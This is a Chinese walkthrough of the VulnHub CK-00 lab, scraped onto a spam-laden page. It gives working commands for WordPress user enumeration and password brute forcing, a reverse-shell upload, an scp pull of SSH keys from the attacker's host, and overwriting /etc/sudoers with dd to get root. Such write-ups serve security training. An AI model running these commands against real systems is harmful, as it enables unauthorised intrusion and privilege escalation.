当前位置: 首页 > news >正文

h5手机制作网站开发网页制作素材库哪个网站

h5手机制作网站开发,网页制作素材库哪个网站,优秀专题网站,海南省住房公积金管理局咨询电话CK-00靶机详解 靶场下载地址:https://download.vulnhub.com/ck/CK-00.zip 这个靶场扫描到ip打开后发现主页面css是有问题的,一般这种情况就是没有配置域名解析。 我们网站主页右击查看源代码,发现一个域名。 把域名添加到我们hosts文件中。…

CK-00靶机详解

靶场下载地址:https://download.vulnhub.com/ck/CK-00.zip

这个靶场扫描到ip打开后发现主页面css是有问题的,一般这种情况就是没有配置域名解析。

我们网站主页右击查看源代码,发现一个域名。

image-20230725205856051

把域名添加到我们hosts文件中。

image-20230725205950458

目录扫描时候发现这是一个wordpress的网站,两个登陆页面,都是一样的。

image-20230725205830886

wpscan可以扫描出wordpress的登陆用户名。

wpscan --url http://ck --enumerate u

image-20230725210142587

这时候我们扫出来一个用户名叫做admin

image-20230725210158051

然后根据这个用户名爆破一下。

wpscan --url http://ck -U admin -P /usr/share/wordlists/rockyou.txt

image-20230725210321398

大概两分钟密码就出来了,账号密码都是admin

image-20230725210551676

我们登陆上wordpress的后台,这个位置是一个插件,这里可以上传php文件,我们可以上传一个反弹shell。

image-20230725211702587

image-20230725211721246

这个目录通常是wordpress上传上来文件的位置。

image-20230725211531575

打开一下我们的反弹shell文件。

image-20230725211758654

kali中监听一下,这边就拿到了一个web shell。

利用python3拿到一个稳定的shell。

python3 -c "import pty;pty.spawn('/bin/bash')"

image-20230725211916041

通常wordress都有一个配置文件,里面有数据库的账号密码。

image-20230725212801749

在这里面找到一个账号密码,这个密码不是root用户的密码

image-20230725212850922

但是发现这个密码能进去bla用户。

bla_is_my_password

image-20230725214653741

sudo -l发现这个用户可以以bla1用户的身份执行scp命令。

image-20230725214822551

这里我们看一下,在bla1目录下是没有.ssh文件的,当我们用scp命令拷贝我们kali中的一个文件时候,它会先私钥验证看看能不能拷贝,所以就在这里面自动创建了一个.ssh目录。

我们可以把我们kali的authorized_keys文件拷贝到靶机的这个.ssh中去就可以免密登陆这个用户了。

image-20230725215328064

这里我们拷贝到这个新出现的.ssh目录中去。

sudo -u bla1 /usr/bin/scp root@192.168.102.129:/root/.ssh/authorized_keys .ssh/

image-20230725221244148

然后用我们kali的私钥就可以登陆bla1用户了

image-20230725221310028

sudo -l后发现bla1用户可以免密执行ck-00用户的rbash.

这里我们就可以拿到ck-00用户的rbash了。

image-20230725221416628

拿到ck-00的rbash后sudo -l发现可以免密以root权限执行dd命令。

image-20230725222051890

dd命令可以往一个文件中写东西,以覆盖的方式。

这时候我们直接给bla用户所有的权限,写到sudoers文件中,bla用户就有全部的权限了,可以直接提权。

echo "bla  ALL=(ALL:ALL) NOPASSWD:ALL"|sudo dd of=/etc/sudoers

image-20230725222117743

我们登陆上bla用户直接提权发现拿到了root权限。

image-20230725222145786

http://www.yayakq.cn/news/270177/

相关文章:

  • 怎么用ps做简单网站苏州优秀网站设计企业
  • 企业网站优化公司erp企业管理系统软件开发
  • wordpress 插件站竣工验收报告查询网
  • 网站开发时会遇到哪些问题dw网页设计模板网站
  • wordpress缩略图的质量济南做seo外包
  • 自己网站可以加标志吗wordpress 上下篇 插件
  • 青岛网站建设系统公司起名字大全免费两个字
  • 做学校网站素材图片wordpress分类列表前加图标
  • 旅游网站开发内容云南省新农村建设网站
  • 广州十度网络网站开发最好软件技术专业升本可以升哪些专业
  • 南宁共建站如何做网络营销直播
  • 招商网站建设服务商广州建设银行招聘网站
  • 如何在公众号里做网站给图像做标注的网站
  • 茶叶怎么做网站销售机械制造设备类企业网站织梦模板
  • 个人网站建设知乎网站头部seo范例
  • 网站软文营销网站建设与维护 参考文献
  • 推广赚钱西安百度关键词优化
  • 网站建设题库在线制作gif
  • 漯河城乡建设管理局网站国内国际时事写实记录2024
  • 网站免费认证网页设计与网站建设 pdf
  • hph网站模板建设房产网站
  • 经营性质网站备案北海教网站建设
  • 宁波seo网站排名优化公司建设网站我们重中之重-用户体验
  • 系统网站推广方案怎么做巩义网站建设托管
  • 网站建设感受宣传策划方案
  • 好的 做网站的软件公司小游戏开发平台
  • 如何建设合法的网站做医疗的网站
  • 怎样做好手机网站建设lazy load wordpress
  • 网站鼠标悬停动态效果代码手机网站的模板下载
  • 手机制作网站软件企业服务中心建设方案